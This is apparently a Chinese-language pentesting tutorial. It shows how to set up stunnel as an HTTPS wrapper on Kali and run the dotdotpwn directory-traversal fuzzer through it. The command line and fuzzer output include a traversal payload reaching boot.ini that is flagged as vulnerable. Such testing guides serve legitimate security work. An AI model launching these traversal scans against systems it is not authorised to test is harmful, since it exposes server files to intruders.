http://www.spentera.com/2012/03/directory-traversal-with-dotdotpwn-https-mode/
https://www.stunnel.org/howto.html
使用stunnel程序,stunnel参考 https://www.stunnel.org/index.html
stunnel是kali默认程序
可以通过 https://www.stunnel.org/downloads.html页面下载安装
生成二进制文件:
1. wget https://www.stunnel.org/downloads/stunnel-5.07.tar.gz 2. tar vxf stunnel-5.07.tar.gz 3. cd stunnel-5.07/ 4. ./configure 5. make 6. make install
生成SSL pem文件
root@kali:~# openssl req -new -x509 -days 365 -nodes -out stunnel.pem -keyout stunnel.pem
配置参数:
root@kali:~# cat stunnel.conf cert = /root/stunnel.pem #Some security enhancements for UNIX systems - comment them out on Win32 client = yes #options=NO_SSLv2 debug = 5 ; Service-level configuration [https] accept = 127.0.0.1:8080 connect = 206.190.36.45:443
[注意]此处使用的206.190.36.45是yahoo的ip,实际环境中需要替换成需要的IP。
运行stunnel
bash-3.2# stunnel /opt/local/etc/stunnel/stunnel.conf
如果没有错误,则没有任何log显示
验证HTTPS协议:
root@kali:~# nc 127.0.0.1 8080 GET / HTTP/1.1 Host:yahoo.com HTTP/1.1 301 Redirect Date: Wed, 05 Nov 2014 14:24:54 GMT Via: http/1.1 ir8.fp.gq1.yahoo.com (ApacheTrafficServer) Server: ATS Location: https://www.yahoo.com/ Content-Type: text/html Content-Language: en Cache-Control: no-store, no-cache Connection: keep-alive Content-Length: 1450
然后就可以进行dotdotpwn测试:
bash-3.2# perl dotdotpwn.pl -m http-url -h 127.0.0.1 -x 8080 -O -s -u http://127.0.0.1:8080/cms/print.php?page=TRAVERSAL -k WINDOWS -b -q [+] Report name: Reports/127.0.0.1_03-18-2012_23-59.txt [========== TARGET INFORMATION ==========] [+] Hostname: 127.0.0.1 [+] Detecting Operating System (nmap) ... [+] Operating System detected: [+] Protocol: http [+] Port: 8080 [+] Service detected: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1 [=========== TRAVERSAL ENGINE ===========] [+] Creating Traversal patterns (mix of dots and slashes) [+] Multiplying 6 times the traversal patterns (-d switch) [+] Creating the Special Traversal patterns [+] Translating (back)slashes in the filenames [+] Adapting the filenames according to the OS type detected (generic) [+] Including Special sufixes [+] Traversal Engine DONE ! - Total traversal tests created: 14640 [=========== TESTING RESULTS ============] [+] Ready to launch 3.33 traversals per second [+] Press Enter to start the testing (You can stop it pressing Ctrl + C) [+] Replacing "TRAVERSAL" with the traversals created and sending . . [*] Testing URL: http://127.0.0.1:8080/cms/print.php?page=../../../../../boot.ini <== VULNERABLE [+] Fuzz testing finished after 0.08 minutes (5 seconds) [+] Total Traversals found: 1 [+] Report saved: Reports/127.0.0.1_03-18-2012_23-59.txt